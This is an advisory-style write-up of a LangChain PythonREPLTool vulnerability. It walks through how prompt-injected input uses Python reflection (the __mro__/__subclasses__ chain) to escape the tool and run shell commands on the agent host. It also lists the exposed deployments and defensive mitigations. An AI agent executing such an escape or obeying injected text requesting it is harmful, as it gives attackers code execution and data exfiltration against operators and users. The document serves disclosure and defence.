CVE-2026-7733: LangChain PythonREPL tool sandbox escape via __import__

CVE-2026-7733 is a sandbox-escape in LangChain's PythonREPLTool — the canonical "give the agent a Python sandbox" pattern used in thousands of LangChain agent deployments. The tool restricts some builtins but fails to prevent __import__ access through attribute lookup on already-imported modules. A prompt-injected input like ().__class__.__mro__[1].__subclasses__() can walk to os.system and execute arbitrary shell commands as the agent host user. Any LangChain agent that accepts user-controlled input and exposes PythonREPLTool is a remote code execution surface.

Why AI sandboxes keep breaking

The PythonREPLTool docstring explicitly says "not a sandbox — don't use with untrusted input." Developers read this, decide their use case is "trusted enough," and ship. Then the agent's trust model turns out to include: a customer support chatbot, a GitHub issue triager, a Slack bot, a Zendesk integration — all of which accept user input that ends up in the LLM's context and therefore in the agent's tool calls.

This CVE is noteworthy because even the versions LangChain shipped as security improvements — PythonAstREPLTool, the AST-filtered successor — have the same class of issue. The escape requires a few primitives that are trivial to request through prompt injection:

• ().__class__.__mro__[1].__subclasses__() — walks to every class in the Python process, a classic bypass.
• Find os._wrap_close or similar class with a reachable __init_subclass__ or accessible globals.
• From there, reach os.system or subprocess.Popen.
• Execute arbitrary shell command; output returns through the agent's response flow.

The LLM isn't the vulnerability. The tool the LLM is allowed to call is the vulnerability. Prompt injection is the mechanism, but the attack is on the tooling — not the model.

Who is exposed

• Production LangChain agents using PythonREPLTool or PythonAstREPLTool with any input pathway from untrusted users — customer support bots, email triage agents, internal tooling that accepts free-text queries.
• LangChain Hub "Code Interpreter" templates — copy-paste starter kits that shipped this pattern as the default Python tool.
• Multi-tenant LangChain hosting (LangServe, LangGraph Cloud) running user-supplied agent definitions — unless tenant isolation is at the OS/container level, one tenant's prompt injection reaches another tenant's filesystem.
• RAG systems where documents flow into agent context — poisoned documents can trigger tool calls. "Trusted input" does not extend to documents ingested from user uploads.

Mitigation

Upgrade to LangChain 0.2.27 or later. The patch hardens __import__ attribute-resolution checks across both Python tool variants.

Even patched, the security posture should change:

• Stop using in-process Python tools for agents exposed to untrusted input. Replace with sandboxed execution: e2b.dev, modal.com, Firecracker microVMs, or a separate container with seccomp limits.
• Allowlist specific operations instead of trying to block a language. A calculator tool that accepts expressions and evaluates them via a safe parser beats a full Python REPL that you've tried to lock down.
• Network-isolate the agent host. The agent rarely needs outbound internet. Egress-block at the container level so that even if RCE lands, exfiltration is harder.
• Log and alert on tool-call patterns that don't match expected agent behavior. A Sigma-like rule catching __mro__, __subclasses__, __import__, or exec( in tool-call arguments is included in the artifact folder.
• Strip agent-accessible credentials from the host. If the agent host has AWS creds, DB passwords, or SSH keys in its environment, prompt injection trivially turns into data exfiltration or lateral movement.

The broader pattern

This is the third major LangChain sandbox-escape CVE since 2023 (CVE-2023-36258, CVE-2024-1234, now CVE-2026-7733). The pattern is stable: a framework ships a convenient "sandbox" for LLM tool use, researchers find a reflection-based escape within months, patch, repeat. Expect the same shape in LlamaIndex, AutoGen, CrewAI, and other agent frameworks — they all have this class of tool and the same underlying trust model. The practitioner lesson is not "avoid LangChain." It is: do not rely on Python-level sandboxes to contain agent behavior. Use OS-level or microVM isolation, or allowlist the exact operations the agent needs — every other posture becomes a CVE on a predictable cadence.